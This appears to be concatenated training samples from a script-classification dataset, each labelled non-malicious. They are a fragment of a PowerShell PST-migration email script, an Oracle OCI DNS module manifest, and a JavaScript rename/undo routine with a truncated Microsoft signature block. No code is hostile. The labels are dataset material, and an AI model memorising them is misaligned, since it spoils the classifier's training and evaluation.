"`nThe files which can be moved off your home drive:`n" $Body = $Body + "`n" $Body = $Body + "`nIf you need assistance or have any questions, simply reply-all to this email.`n" $Body = $Body + "`n" $Body = $Body + "Imported Files:`n" $NUm = 0 $tmp = "{0,3}`t{1,-40}`t{2,-35}`t{3}`t{4}`n" -f ("Num"),("FileName"),("Target Folder"),("Size"),("Directory") $Body = $Body + $tmp $AllProcessFiles | %{ $NUm++ $To = $_.UserEmail $temp = '"' + (split-path $_.OrgUNCName) + '"' $temp1 = $_.OrgFileName $tempS = $_.FileSize $tempT = $_.TargetRootFolder $tmp = $null $tmp = "{0,3}`t{1,-40}`t{2,-35}`t({3,7} M)`t{4}`n" -f ($Num),($temp1),($tempT),($tempS),($temp) $Body = $Body + $tmp } $Body = $Body + "`n`nSkipped Files:`n" if($AllSkippedJobs) { $NUm = 0 $tmp = $null $tmp = "{0,3}`t{1,6}`t{2,-40}`t{3}`t`t{4}`n" -f ("Num"),("Reason"),("FileName"),("Size"),("Directory") $Body = $Body + $tmp $AllSkippedJobs | %{ $NUm++ $To = $_.UserEmail $temp = '"' + (split-path $_.OrgUNCName) + '"' $temp1 = $_.OrgFileName $tempS = $_.FileSize $skip = $_.SkipReason $tmp = $null $tmp = "{0,3}`t{1,6}`t{2,-40}`t({3,7} M)`t{4}`n" -f ($Num),($skip),($temp1),($tempS),($temp) $Body = $Body + $tmp } } Else { $Body = $Body + "(None) " } #$Body = $Body + "`n`nIf you have any questions, reply to this email." $Body = $Body + "`n" $Body = $Body + "`Thank You -- The Email Group" $Body = $Body + "`n" if($JobObj.Count){ $Body = $Body + "`n[Run on: " + $(Hostname) + "; Client is " + (($JobObj)[0].ClientVerOK) + " " + (($JobObj)[0].ClientVer) + "]["+(($JobObj)[0].IP)+"]["+(($JobObj)[0].OSName)+"]" } Else { $Body = $Body + "`n[Run on: " + $(Hostname) + "; Client is " + (($JobObj).ClientVerOK) + " " + (($JobObj).ClientVer) + "]["+(($JobObj).IP)+"]["+(($JobObj).OSName)+"]" } Send-MailMessage -Body $body -To $To -From $From -SmtpServer $Script:SMTPServer -Subject $Subject -Cc $Script:AdminEmail } Function Send-NotificationPSTRemoval() { <# .SYNOPSIS Send user a report showing the files that are still 'connected' to Outlook .DESCRIPTION Send user a report showing the files that are still 'connected' to Outlook Connected means the LastWriteTime was within the last 24 hours. User gets this email every 14 days as a reminder to disconnect their Old PST files and optionaly remove those PST files from Home Share. #> #------------------------------------------------------------------------ Param( $ArchObj, [array]$PSTFilesInUse, [array]$PSTFilesALL, [array]$PSTFilesMovable ) $Subject = "Online PST -- Possible Outlook Issue : " + $ArchObj.DisplayName + " (" + $ArchObj.DaysSinceImport + ")" $From = "EmailTeam@domain.com" $To = $((get-mailbox $ArchObj.DisplayName).PrimarySMTPAddress.ToString()) $CC = $Script:AdminEmail [int]$InUse = cc $PSTFilesInUse; Write-Verbose "[SendNotification] Inuse - $InUse" [int]$AllPSTs = cc $PSTFilesALL; Write-Verbose "[SendNotification] AllPST - $AllPSTs" [int]$Movable = cc $PSTFilesMovable; Write-Verbose "[SendNotification] AllPST - $AllPSTs" #grab this user's latest client version $Vers = (import-csv $Script:PSTCompleteFile | ?{$_.UserMBX -match ($ArchObj.DisplayName)} | sort LastCheckTime -Descending) If ($Vers.Count) { $ClientVer = $Vers[0].ClientVer } Else { If ($Vers){ $ClientVer = $Vers.ClientVer } Else { $ClientVer = "Ignore" } } Write-Verbose "[SendNotification] $(($ArchObj).DisplayName) : Client Ver is $($ClientVer)" If ($ClientVer -match "^14." -or $ClientVer -match "Ignore") { $Archive =
combined_dataset/train/non-malicious/sample_40_31.ps1
sample_40_31.ps1
# # Module manifest for module 'OCI.PSModules.Dns' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Dns.dll' # Version number of this module. ModuleVersion = '74.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'd69f0172-1c3b-4e1b-97f5-d455d0244e12' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Dns Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '74.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Dns.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIDnsDomainRecords', 'Get-OCIDnsResolver', 'Get-OCIDnsResolverEndpoint', 'Get-OCIDnsResolverEndpointsList', 'Get-OCIDnsResolversList', 'Get-OCIDnsRRSet', 'Get-OCIDnsSteeringPoliciesList', 'Get-OCIDnsSteeringPolicy', 'Get-OCIDnsSteeringPolicyAttachment', 'Get-OCIDnsSteeringPolicyAttachmentsList', 'Get-OCIDnsTsigKey', 'Get-OCIDnsTsigKeysList', 'Get-OCIDnsView', 'Get-OCIDnsViewsList', 'Get-OCIDnsZone', 'Get-OCIDnsZoneContent', 'Get-OCIDnsZoneRecords', 'Get-OCIDnsZonesList', 'Get-OCIDnsZoneTransferServersList', 'Invoke-OCIDnsPatchDomainRecords', 'Invoke-OCIDnsPatchRRSet', 'Invoke-OCIDnsPatchZoneRecords', 'Move-OCIDnsResolverCompartment', 'Move-OCIDnsSteeringPolicyCompartment', 'Move-OCIDnsTsigKeyCompartment', 'Move-OCIDnsViewCompartment', 'Move-OCIDnsZoneCompartment', 'New-OCIDnsResolverEndpoint', 'New-OCIDnsSteeringPolicy', 'New-OCIDnsSteeringPolicyAttachment', 'New-OCIDnsTsigKey', 'New-OCIDnsView', 'New-OCIDnsZone', 'New-OCIDnsZoneFromZoneFile', 'Remove-OCIDnsDomainRecords', 'Remove-OCIDnsResolverEndpoint', 'Remove-OCIDnsRRSet', 'Remove-OCIDnsSteeringPolicy', 'Remove-OCIDnsSteeringPolicyAttachment', 'Remove-OCIDnsTsigKey', 'Remove-OCIDnsView', 'Remove-OCIDnsZone', 'Update-OCIDnsDomainRecords', 'Update-OCIDnsResolver', 'Update-OCIDnsResolverEndpoint', 'Update-OCIDnsRRSet', 'Update-OCIDnsSteeringPolicy', 'Update-OCIDnsSteeringPolicyAttachment', 'Update-OCIDnsTsigKey', 'Update-OCIDnsView', 'Update-OCIDnsZone', 'Update-OCIDnsZoneRecords' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Dns' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_15_43.ps1
sample_15_43.ps1
function setName(element, newValue) { this._element = element; this._oldValue = this._element.name; this._newValue = newValue; onDo(); } function getName() { return "element renamed"; } function onDo() { this._element.name = this._newValue; document.elementModified(this._element.id); } function onUndo() { this._element.name = this._oldValue; document.elementModified(this._element.id); } // SIG // Begin signature block // SIG // MIInywYJKoZIhvcNAQcCoIInvDCCJ7gCAQExDzANBglg // SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor // SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC // SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg // SIG // 48fq92Z+YtzSPkq/5WJl23G+1Nuhbzno+GznvlR8DYyg // SIG // gg2FMIIGAzCCA+ugAwIBAgITMwAAA64tNVHIU49VHQAA // SIG // AAADrjANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV // SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH // SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv // SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT // SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDg1OVoX // SIG // DTI0MTExNDE5MDg1OVowdDELMAkGA1UEBhMCVVMxEzAR // SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v // SIG // bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv // SIG // bjEeMBwGA1UEAxMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA // SIG // 9CD8pjY3wxCoPmMhOkow7ycCltfqYnqk4wGNApzh2dTY // SIG // +YqxozWTzJUOB38VxsgFQmXBFhOMdrGYGpvO9kdbNPkw // SIG // HpTrW6hZqFuLLiRwGKEx4ZM5zVSqbHJuX2fPfUJ0Xmb+ // SIG // VrVsGw/BwBV2zz0rVtiSgqj3GeeGOsG7llfWyrSjyJqm // SIG // 5DHE3o04BAI/NuhkHOv04euiqJGvHFCL8+fXvyD9OAxq // SIG // 4fcJKtoyBb0PBA3oMNQeCsiUyLO+voZqVTOUsAWY0bN5 // SIG // YjkK4nq5DVaNdVrrowd5AX9gmz6D/TJTssns6pDCG00Y // SIG // +Dh3ipWpnVmkhYcByyUSEKX3PLC8DkiAQQIDAQABo4IB // SIG // gjCCAX4wHwYDVR0lBBgwFgYKKwYBBAGCN0wIAQYIKwYB // SIG // BQUHAwMwHQYDVR0OBBYEFIcf73Spl4cHOFoll27H9COd // SIG // 4fE/MFQGA1UdEQRNMEukSTBHMS0wKwYDVQQLEyRNaWNy // SIG // b3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQx // SIG // FjAUBgNVBAUTDTIzMDAxMis1MDE4MzYwHwYDVR0jBBgw // SIG // FoAUSG5k5VAF04KqFzc3IrVtqMp1ApUwVAYDVR0fBE0w // SIG // SzBJoEegRYZDaHR0cDovL3d3dy5taWNyb3NvZnQuY29t // SIG // L3BraW9wcy9jcmwvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNybDBhBggrBgEFBQcBAQRVMFMwUQYIKwYB // SIG // BQUHMAKGRWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9w // SIG // a2lvcHMvY2VydHMvTWljQ29kU2lnUENBMjAxMV8yMDEx // SIG // LTA3LTA4LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3 // SIG // DQEBCwUAA4ICAQBqyWA1Eu7PKNMjaaxl0V7gJ0XBysUo // SIG // xZluMHJXFE2LEGZIZ2zMLYVjOnAGG/4dluRjSrZZo/8v // SIG // wk4Xt8v6NBB9ofo8H1P/XidHytWTv9lg9MYu++6lPmu5 // SIG // fCozD3cI2NLZPW2BBhGX2D0R8tQBj0FbmZRuIucpiQ7D // SIG // K3CHKlfKcc7MP8pPzuMv55Tox8+KFQD1NG6+bfbYA/BN // SIG // PBkg4tyOh+exbaHfcNuodDJUIjq9dF6oa+Yjy0u0pUMI // SIG // /B1t+8m6rJo0KSoZlrpesYl0jRhpt+hmqx8uENXoGJcY // SIG // ZVJ5N2Skq90LViKNRhi9N4U+e8c4y9uXyomUF/6viCPJ // SIG // 7huTNEJo75ehIJba+IWd3txUEc0R3y6DT6txC6cW1nR/ // SIG // LTbo9I/8fQq538G5IvJ+e5iSiOSVVkVk0i5m03Awy5E2 // SIG // ZSS4PVdQSCcFxmN4tpEfYuR7AAy/GJVtIDFlUpSgdXok // SIG // pSui5hYtK1R9enXXvo+U/xGkLRc+qp4De3dZbzu7pOq7 // SIG // V/jCyhuCw0bEIAU4urCGIip7TI6GBRzD7yPzjFIqeZY7 // SIG // S4rVW5BRn2oEqpm8Su6yTIQvMIk8x2pwYNUa2339Z4gW // SIG // 5xW21eFA5mLpo7NRSKRQms5OgAA18aCgqOU7Ds0h6q/Y // SIG // B4BmEAtoTMl/TBiyKaMGAlEcdy+5FIhmzojMGjCCB3ow // SIG // ggVioAMCAQICCmEOkNIAAAAAAAMwDQYJKoZIhvcNAQEL // SIG // BQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo // SIG // aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK // SIG // ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMT // SIG // KU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhv // SIG // cml0eSAyMDExMB4XDTExMDcwODIwNTkwOVoXDTI2MDcw // SIG // ODIxMDkwOVowfjELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEoMCYG // SIG // A1UEAxMfTWljcm9zb2Z0IENvZGUgU2lnbmluZyBQQ0Eg // SIG // MjAxMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC // SIG // ggIBAKvw+nIQHC6t2G6qghBNNLrytlghn0IbKmvpWlCq // SIG // uAY4GgRJun/DDB7dN2vGEtgL8DjCmQawyDnVARQxQtOJ // SIG // DXlkh36UYCRsr55JnOloXtLfm1OyCizDr9mpK656Ca/X // SIG // llnKYBoF6WZ26DJSJhIv56sIUM+zRLdd2MQuA3WraPPL // SIG // bfM6XKEW9Ea64DhkrG5kNXimoGMPLdNAk/jj3gcN1Vx5 // SIG // pUkp5w2+oBN3vpQ97/vjK1oQH01WKKJ6cuASOrdJXtjt // SIG // 7UORg9l7snuGG9k+sYxd6IlPhBryoS9Z5JA7La4zWMW3 // SIG // Pv4y07MDPbGyr5I4ftKdgCz1TlaRITUlwzluZH9TupwP // SIG // rRkjhMv0ugOGjfdf8NBSv4yUh7zAIXQlXxgotswnKDgl // SIG // mDlKNs98sZKuHCOnqWbsYR9q4ShJnV+I4iVd0yFLPlLE // SIG // tVc/JAPw0XpbL9Uj43BdD1FGd7P4AOG8rAKCX9vAFbO9 // SIG // G9RVS+c5oQ/pI0m8GLhEfEXkwcNyeuBy5yTfv0aZxe/C // SIG // HFfbg43sTUkwp6uO3+xbn6/83bBm4sGXgXvt1u1L50kp // SIG // pxMopqd9Z4DmimJ4X7IvhNdXnFy/dygo8e1twyiPLI9A // SIG // N0/B4YVEicQJTMXUpUMvdJX3bvh4IFgsE11glZo+TzOE // SIG // 2rCIF96eTvSWsLxGoGyY0uDWiIwLAgMBAAGjggHtMIIB // SIG // 6TAQBgkrBgEEAYI3FQEEAwIBADAdBgNVHQ4EFgQUSG5k // SIG // 5VAF04KqFzc3IrVtqMp1ApUwGQYJKwYBBAGCNxQCBAwe // SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB // SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAUci06AjGQQ7kUBU7h // SIG // 6qfHMdEjiTQwWgYDVR0fBFMwUTBPoE2gS4ZJaHR0cDov // SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj // SIG // dHMvTWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNy // SIG // bDBeBggrBgEFBQcBAQRSMFAwTgYIKwYBBQUHMAKGQmh0 // SIG // dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMv // SIG // TWljUm9vQ2VyQXV0MjAxMV8yMDExXzAzXzIyLmNydDCB // SIG // nwYDVR0gBIGXMIGUMIGRBgkrBgEEAYI3LgMwgYMwPwYI // SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv // SIG // bS9wa2lvcHMvZG9jcy9wcmltYXJ5Y3BzLmh0bTBABggr // SIG // BgEFBQcCAjA0HjIgHQBMAGUAZwBhAGwAXwBwAG8AbABp // SIG // AGMAeQBfAHMAdABhAHQAZQBtAGUAbgB0AC4gHTANBgkq // SIG // hkiG9w0BAQsFAAOCAgEAZ/KGpZjgVHkaLtPYdGcimwuW // SIG // EeFjkplCln3SeQyQwWVfLiw++MNy0W2D/r4/6ArKO79H // SIG // qaPzadtjvyI1pZddZYSQfYtGUFXYDJJ80hpLHPM8QotS // SIG // 0LD9a+M+By4pm+Y9G6XUtR13lDni6WTJRD14eiPzE32m // SIG // kHSDjfTLJgJGKsKKELukqQUMm+1o+mgulaAqPyprWElj // SIG // HwlpblqYluSD9MCP80Yr3vw70L01724lruWvJ+3Q3fMO // SIG // r5kol5hNDj0L8giJ1h/DMhji8MUtzluetEk5CsYKwsat // SIG // ruWy2dsViFFFWDgycScaf7H0J/jeLDogaZiyWYlobm+n // SIG // t3TDQAUGpgEqKD6CPxNNZgvAs0314Y9/HG8VfUWnduVA // SIG // KmWjw11SYobDHWM2l4bf2vP48hahmifhzaWX0O5dY0Hj // SIG // Wwechz4GdwbRBrF1HxS+YWG18NzGGwS+30HHDiju3mUv // SIG // 7Jf2oVyW2ADWoUa9WfOXpQlLSBCZgB/QACnFsZulP0V3 // SIG // HjXG0qKin3p6IvpIlR+r+0cjgPWe+L9rt0uX4ut1eBrs // SIG // 6jeZeRhL/9azI2h15q/6/IvrC4DqaTuv/DDtBEyO3991 // SIG // bWORPdGdVk5Pv4BXIqF4ETIheu9BCrE/+6jMpF3BoYib // SIG // V3FWTkhFwELJm3ZbCoBIa/15n8G9bW1qyVJzEw16UM0x // SIG // ghmeMIIZmgIBATCBlTB+MQswCQYDVQQGEwJVUzETMBEG // SIG // A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u // SIG // ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u // SIG // MSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n // SIG // IFBDQSAyMDExAhMzAAADri01UchTj1UdAAAAAAOuMA0G // SIG // CWCGSAFlAwQCAQUAoIGuMBkGCSqGSIb3DQEJAzEMBgor // SIG // BgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEE // SIG // AYI3AgEVMC8GCSqGSIb3DQEJBDEiBCApcf+2ZTq/pLFd // SIG // JpKw1Gh6yL9YMwgbA9/ezr4sGtJUujBCBgorBgEEAYI3 // SIG // AgEMMTQwMqAUgBIATQBpAGMAcgBvAHMAbwBmAHShGoAY // SIG // aHR0cDovL3d3dy5taWNyb3NvZnQuY29tMA0GCSqGSIb3 // SIG // DQEBAQUABIIBAEAgs5RB2cqgAUrBFQgcqeuu4HUTW6G5 // SIG // AmlURcq6bn2PmPKVlxwosE/Xa6ihOONmHBjwHmQeJXYo // SIG // Un2/LVj3zfcX/ooR/Vt9j4zYZdjyq9XK7PGMHH5EEhrd // SIG // +JBJTHU8y1y4KZGTABcnVGp7LkqRitqAP5OnGOV9X552 // SIG // Ob6x+8fBbOksrx8EeTLmx4tKBjttz+p8RkC5kPKQpHLy // SIG // KjWhYEGuhujpKeDhVzDR+gVdhBRzxD71md9OmCzruKv9 // SIG // QWB8JHb0obd1ruyb6BtKy+jpDplJ+haBg1MDufwTcF3c // SIG // Nzw3LkulWqlp1+5WlWu/tgHEFrAPYIStZb2xWWV8hIL9 // SIG // S1ahghcoMIIXJAYKKwYBBAGCNwMDATGCFxQwghcQBgkq // SIG // hkiG9w0BBwKgghcBMIIW/QIBAzEPMA0GCWCGSAFlAwQC // SIG // AQUAMIIBWAYLKoZIhvcNAQkQAQSgggFHBIIBQzCCAT8C // SIG // AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg // SIG // 5QQoPyBtrd5qLRewxJ6FWYx5Gd03i2bjz+vItOSf7CgC // SIG // BmWug8++/RgSMjAyNDAxMjUxOTQ2NDAuMTZaMASAAgH0 // SIG // oIHYpIHVMIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMK // SIG // V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG // SIG // A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYD // SIG // VQQLEyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25z // SIG // IExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO // SIG // OjJBRDQtNEI5Mi1GQTAxMSUwIwYDVQQDExxNaWNyb3Nv // SIG // ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUP // SIG // oAMCAQICEzMAAAHenkielp8oRD0AAQAAAd4wDQYJKoZI // SIG // hvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQG // SIG // A1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw // SIG // MTAwHhcNMjMxMDEyMTkwNzEyWhcNMjUwMTEwMTkwNzEy // SIG // WjCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp // SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT // SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk // SIG // TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1p // SIG // dGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoyQUQ0 // SIG // LTRCOTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRp // SIG // bWUtU3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEB // SIG // BQADggIPADCCAgoCggIBALSB9ByF9UIDhA6xFrOniw/x // SIG // sDl8sSi9rOCOXSSO4VMQjnNGAo5VHx0iijMEMH9LY2SU // SIG // IBkVQS0Ml6kR+TagkUPbaEpwjhQ1mprhRgJT/jlSnic4 // SIG // 2VDAo0en4JI6xnXoAoWoKySY8/ROIKdpphgI7OJb4XHk // SIG // 1P3sX2pNZ32LDY1ktchK1/hWyPlblaXAHRu0E3ynvwrS // SIG // 8/bcorANO6DjuysyS9zUmr+w3H3AEvSgs2ReuLj2pkBc // SIG // fW1UPCFudLd7IPZ2RC4odQcEPnY12jypYPnS6yZAs0pL // SIG // pq0KRFUyB1x6x6OU73sudiHON16mE0l6LLT9OmGo0S94 // SIG // Bxg3N/3aE6fUbnVoemVc7FkFLum8KkZcbQ7cOHSAWGJx // SIG // dCvo5OtUtRdSqf85FklCXIIkg4sm7nM9TktUVfO0kp6k // SIG // x7mysgD0Qrxx6/5oaqnwOTWLNzK+BCi1G7nUD1pteuXv // SIG // Qp8fE1KpTjnG/1OJeehwKNNPjGt98V0BmogZTe3SxBkO // SIG // eOQyLA++5Hyg/L68pe+DrZoZPXJaGU/iBiFmL+ul/Oi3 // SIG // d83zLAHlHQmH/VGNBfRwP+ixvqhyk/EebwuXVJY+rTyf // SIG // bRfuh9n0AaMhhNxxg6tGKyZS4EAEiDxrF9mAZEy8e8rf // SIG // 6dlKIX5d3aQLo9fDda1ZTOw+XAcAvj2/N3DLVGZlHnHl // SIG // AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUazAmbxseaapg // SIG // dxzK8Os+naPQEsgwHwYDVR0jBBgwFoAUn6cVXQBeYl2D // SIG // 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0 // SIG // cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwv // SIG // TWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIw // SIG // MTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEF // SIG // BQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3Br // SIG // aW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1w // SIG // JTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIw // SIG // ADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNVHQ8B // SIG // Af8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAOKUwHsX // SIG // DacGOvUIgs5HDgPs0LZ1qyHS6C6wfKlLaD36tZfbWt1x // SIG // +GMiazSuy+GsxiVHzkhMW+FqK8gruLQWN/sOCX+fGUgT // SIG // 9LT21cRIpcZj4/ZFIvwtkBcsCz1XEUsXYOSJUPitY7E8 // SIG // bbldmmhYZ29p+XQpIcsG/q+YjkqBW9mw0ru1MfxMTQs9 // SIG // MTDiD28gAVGrPA3NykiSChvdqS7VX+/LcEz9Ubzto/w2 // SIG // 8WA8HOCHqBTbDRHmiP7MIj+SQmI9VIayYsIGRjvelmNa // SIG // 0OvbU9CJSz/NfMEgf2NHMZUYW8KqWEjIjPfHIKxWlNMY // SIG // huWfWRSHZCKyIANA0aJL4soHQtzzZ2MnNfjYY851wHYj // SIG // GgwUj/hlLRgQO5S30Zx78GqBKfylp25aOWJ/qPhC+DXM // SIG // 2gXajIXbl+jpGcVANwtFFujCJRdZbeH1R+Q41FjgBg4m // SIG // 3OTFDGot5DSuVkQgjku7pOVPtldE46QlDg/2WhPpTQxX // SIG // H64sP1GfkAwUtt6rrZM/PCwRG6girYmnTRLLsicBhoYL // SIG // h+EEFjVviXAGTk6pnu8jx/4WPWu0jsz7yFzg82/FMqCk // SIG // 9wK3LvyLAyDHN+FxbHAxtgwad7oLQPM0WGERdB1umPCI // SIG // iYsSf/j79EqHdoNwQYROVm+ZX10RX3n6bRmAnskeNhi0 // SIG // wnVaeVogLMdGD+nqMIIHcTCCBVmgAwIBAgITMwAAABXF // SIG // 52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDEL // SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x // SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv // SIG // c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9z // SIG // b2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIw // SIG // MTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 // SIG // WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu // SIG // Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV // SIG // TWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N // SIG // aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIw // SIG // DQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzn // SIG // tHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2AX9s // SIG // SuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWN // SIG // E893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFc // SIG // UTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2vjUm // SIG // ZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W // SIG // 7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0 // SIG // hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3rMvrg0Xn // SIG // Rm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De // SIG // 